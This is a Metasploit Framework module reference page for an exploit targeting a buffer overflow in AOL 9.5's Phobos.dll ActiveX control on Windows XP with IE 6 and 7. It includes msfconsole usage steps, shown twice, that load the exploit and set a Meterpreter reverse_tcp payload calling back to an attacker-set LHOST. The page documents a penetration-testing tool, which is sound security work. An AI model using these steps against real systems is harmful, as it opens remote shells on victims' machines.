Browse Exploit & Auxiliary Modules
The Metasploit Project hosts the world's largest database of quality assured exploits, including hundreds of remote exploits, auxiliary modules, and payloads. You can even review the Metasploit Framework source code of any module - or write your own.
Search for modules
AOL 9.5 Phobos.Playlist Import() Stack-based Buffer Overflow
This module exploits a stack-based buffer overflow within Phobos.dll of AOL 9.5. By setting an overly long value to 'Import()', an attacker can overrun a buffer and execute arbitrary code. NOTE: This ActiveX control is NOT marked safe for scripting or initialization.
Rank
- Average
Authors
- Trancer < mtrancer [at] gmail.com >
References
- OSVDB-61964
- http://www.exploit-db.com/exploits/11204
- http://www.rec-sec.com/2010/01/25/aol-playlist-class-buffer-overflow/
Exploit Targets
- 0 - Windows XP SP0-SP3 / IE 6.0 SP0-2 & IE 7.0 (default)
Development
Similar Modules
- exploit/windows/fileformat/a-pdf_wav_to_mp3
- exploit/windows/fileformat/acdsee_fotoslate_string
- exploit/windows/fileformat/acdsee_xpm
- exploit/windows/fileformat/activepdf_webgrabber
- exploit/windows/fileformat/adobe_collectemailinfo
- exploit/windows/fileformat/adobe_cooltype_sing
- exploit/windows/fileformat/adobe_flashplayer_button
- exploit/windows/fileformat/adobe_flashplayer_newfunction
- exploit/windows/fileformat/adobe_flatedecode_predictor02
- exploit/windows/fileformat/adobe_geticon
Usage Information
$ msfconsole
## ### ## ##
## ## #### ###### #### ##### ##### ## #### ######
####### ## ## ## ## ## ## ## ## ## ## ### ##
####### ###### ## ##### #### ## ## ## ## ## ## ##
## # ## ## ## ## ## ## ##### ## ## ## ## ##
## ## #### ### ##### ##### ## #### #### #### ###
##
msf > use exploit/windows/fileformat/aol_phobos_bof
msf exploit(aol_phobos_bof) > show payloads
msf exploit(aol_phobos_bof) > set PAYLOAD windows/meterpreter/reverse_tcp
msf exploit(aol_phobos_bof) > set LHOST [MY IP ADDRESS]
msf exploit(aol_phobos_bof) > exploit
## ### ## ##
## ## #### ###### #### ##### ##### ## #### ######
####### ## ## ## ## ## ## ## ## ## ## ### ##
####### ###### ## ##### #### ## ## ## ## ## ## ##
## # ## ## ## ## ## ## ##### ## ## ## ## ##
## ## #### ### ##### ##### ## #### #### #### ###
##
msf > use exploit/windows/fileformat/aol_phobos_bof
msf exploit(aol_phobos_bof) > show payloads
msf exploit(aol_phobos_bof) > set PAYLOAD windows/meterpreter/reverse_tcp
msf exploit(aol_phobos_bof) > set LHOST [MY IP ADDRESS]
msf exploit(aol_phobos_bof) > exploit
Module Options
| FILENAME | The file name. (default: msf.html) |
| ContextInformationFile | The information file that contains context information |
| DisablePayloadHandler | Disable the handler code for the selected payload |
| EnableContextEncoding | Use transient context when encoding payloads |
| VERBOSE | Enable detailed status messages |
| WORKSPACE | Specify the workspace for this module |
| WfsDelay | Additional delay when waiting for a session |